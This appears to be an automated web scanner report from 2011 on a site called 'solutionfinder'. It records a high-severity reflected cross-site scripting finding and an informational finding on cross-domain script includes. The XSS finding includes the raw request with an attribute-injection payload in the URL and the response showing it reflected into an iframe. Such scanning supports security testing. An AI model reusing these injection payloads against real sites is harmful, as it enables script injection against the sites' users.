1. Cross-site scripting (reflected)
2. Cross-domain script include
Severity: | High |
Confidence: | Certain |
Host: | http://solutionfinder |
Path: | / |
GET /?f1474"style%3d"x Host: solutionfinder.veriz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 05 Sep 2011 15:49:07 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52687 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id ...[SNIP]... <iframe src="SolutionFinder.aspx?f1474"style="x:expression ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://solutionfinder |
Path: | / |
GET / HTTP/1.1 Host: solutionfinder.veriz Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close |
HTTP/1.1 200 OK Connection: close Date: Mon, 05 Sep 2011 15:48:55 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET X-AspNet-Version: 4.0.30319 Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 52513 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head id ...[SNIP]... <![endif]--> <script type="text/javascript" src="https://ecache.vzw <script type="text/javascript" src="https://ecache.vzw <script type="text/javascript" src="https://scache.vzw <script type="text/javascript" src="https://scache.vzw <script type="text/javascript" src="http://164.109.106 ...[SNIP]... |